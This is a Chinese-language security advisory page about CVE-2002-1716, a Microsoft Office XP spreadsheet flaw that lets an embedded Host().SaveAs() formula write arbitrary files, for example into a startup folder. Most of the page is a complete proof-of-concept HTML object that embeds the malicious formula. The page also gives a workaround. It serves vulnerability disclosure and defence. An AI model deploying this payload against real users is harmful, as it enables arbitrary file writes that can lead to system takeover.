首页 -> 安全研究
安全研究
安全漏洞
Microsoft Office XP Spreadsheet Host().SaveAs()文件建立漏洞
发布日期:2002-03-31
更新日期:2002-04-05
受影响系统:
Microsoft Office XP描述:
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows 2000 SP3
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
BUGTRAQ ID: 4398
CVE(CAN) ID: CVE-2002-1716
Microsoft Office XP是一款Microsoft推出的最新的办公室应用软件套件。
Microsoft Office XP在spreadsheet实现上存在漏洞,可导致任意文件写入本地系统。
Microsoft Office XP的spreadsheet组件可以嵌入在WEB页面和OFFICE文档中,此spreadsheet组件的HOST()函数存在漏洞,可以允许建立任意名称的文件并指定放到任意目录如用户启动目录,导致用户启动的时候可以执行建立的文件而控制系统。
攻击者可以通过嵌入包含=Host().SaveAs("arbitraryfilename")形式的spreadsheet对象来对用户进行攻击。
<*来源:Georgi Guninski (guninski@guninski.com)
链接:http://archives.neohapsis.com/archives/bugtraq/2002-03/0371.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
---------------------------------------
<h1>
Hehe. Triyng to sell trustworthy computing.
</h1>
<object
classid="CLSID:0002E551-0000-0000-C000-000000000046" id=Spreadsheet1
v:shapes="_x0000_s1026" class=shape width=81 height=81
u1:shapes="_x0000_s1025">
<param name=DataType value=XMLURL>
<param name=XMLData
value="<?xml version="1.0"?>
<ss:Workbook xmlns:o="urn:schemas-microsoft-com:office:office"
xmlns:x="urn:schemas-microsoft-com:office:excel"
xmlns:ss="urn:schemas-microsoft-com:office:spreadsheet"
xmlns:c="urn:schemas-microsoft-com:office:component:spreadsheet"
xmlns:html="http://www.w3.org/TR/REC-html40"> ;
<x:ExcelWorkbook>
<x:ProtectStructure>False</x:ProtectStructure>
<x:ActiveSheet>0</x:ActiveSheet>
</x:ExcelWorkbook>
<ss:Styles>
<ss:Style
ss:ID="Default">
<ss:Alignment ss:Horizontal="Automatic" ss:Rotate="0.0" ss:Vertical="Bottom"
ss:ReadingOrder="Context"/>
<ss:Borders>
</ss:Borders>
<ss:Font ss:FontName="Arial" ss:Size="10" ss:Color="Automatic" ss:Bold="0"
ss:Italic="0"
ss:Underline="None"/>
<ss:Interior ss:Color="Automatic" ss:Pattern="None"/>
<ss:NumberFormat ss:Format="General"/>
<ss:Protection
ss:Protected="1"/>
</ss:Style>
</ss:Styles>
<c:ComponentOptions>
<c:Label>
<c:Caption>Microsoft Office Spreadsheet</c:Caption>
</c:Label>
<c:PreventPropBrowser/>
<c:MaxHeight>80%</c:MaxHeight>
<c:MaxWidth>80%</c:MaxWidth>
<c:NextSheetNumber>1</c:NextSheetNumber>
</c:ComponentOptions>
<x:WorkbookOptions>
<c:OWCVersion>10.0.0.2621 </c:OWCVersion>
<x:DisableUndo/>
</x:WorkbookOptions>
<ss:Worksheet
ss:Name="Sheet1">
<x:WorksheetOptions>
<x:Selected/>
<x:ViewableRange>R1:R262144</x:ViewableRange>
<x:Selection>R1C1</x:Selection>
<x:TopRowVisible>0</x:TopRowVisible>
<x:LeftColumnVisible>0</x:LeftColumnVisible>
<x:ProtectContents>False</x:ProtectContents>
</x:WorksheetOptions>
<c:WorksheetOptions>
</c:WorksheetOptions>
<ss:Table ss:ExpandedColumnCount="1" ss:ExpandedRowCount="1"
ss:DefaultColumnWidth="48.0"
ss:DefaultRowHeight="12.75">
<ss:Row>
<ss:Cell ss:Formula='=HOST().SaveAs("C:\GGGG5")'>
<ss:Data ss:Type="Boolean">1</ss:Data>
</ss:Cell>
</ss:Row>
</ss:Table>
</ss:Worksheet>
<ss:Worksheet ss:Name="Sheet2">
<x:WorksheetOptions>
<x:ViewableRange>R1:R262144</x:ViewableRange>
<x:Selection>R1C1</x:Selection>
<x:TopRowVisible>0</x:TopRowVisible>
<x:LeftColumnVisible>0</x:LeftColumnVisible>
<x:ProtectContents>False</x:ProtectContents>
</x:WorksheetOptions>
<c:WorksheetOptions>
</c:WorksheetOptions>
</ss:Worksheet>
<ss:Worksheet ss:Name="Sheet3">
<x:WorksheetOptions>
<x:ViewableRange>R1:R262144</x:ViewableRange>
<x:Selection>R1C1</x:Selection>
<x:TopRowVisible>0</x:TopRowVisible>
<x:LeftColumnVisible>0</x:LeftColumnVisible>
<x:ProtectContents>False</x:ProtectContents>
</x:WorksheetOptions>
<c:WorksheetOptions>
</c:WorksheetOptions>
</ss:Worksheet>
<o:DocumentProperties>
<o:Author>ad</o:Author>
<o:LastAuthor>ad</o:LastAuthor>
<o:Created>2002-03-17T12:07:37Z</o:Created>
<o:Company>g</o:Company>
<o:Version>10.2625</o:Version>
</o:DocumentProperties>
<o:OfficeDocumentSettings>
<o:DownloadComponents/>
<o:LocationOfComponents HRef="file:///E:\"/>
</o:OfficeDocumentSettings>
</ss:Workbook>
">
<param name=AllowPropertyToolbox value=0>
<param name=AutoFit value=0>
<param name=Calculation value=-4105>
<param name=Caption value="Microsoft Office Spreadsheet">
<param name=DisplayColumnHeadings value=-1>
<param name=DisplayGridlines value=-1>
<param name=DisplayHorizontalScrollBar value=-1>
<param name=DisplayOfficeLogo value=-1>
<param name=DisplayPropertyToolbox value=0>
<param name=DisplayRowHeadings value=-1>
<param name=DisplayTitleBar value=0>
<param name=DisplayToolbar value=-1>
<param name=DisplayVerticalScrollBar value=-1>
<param name=DisplayWorkbookTabs value=-1>
<param name=EnableEvents value=-1>
<param name=MaxHeight value="80%">
<param name=MaxWidth value="80%">
<param name=MoveAfterReturn value=-1>
<param name=MoveAfterReturnDirection value=-4121>
<param name=RightToLeft value=0>
<param name=ScreenUpdating value=-1>
<param name=EnableUndo value=0>
</object>
---------------------------------
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 如果使用WordMail编辑器编辑信件的用户,请转换为使用Outlook默认编辑器编辑。
厂商补丁:
Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.microsoft.com/technet/security/
浏览次数:4126
严重程度:0(网友投票)
绿盟科技给您安全的保障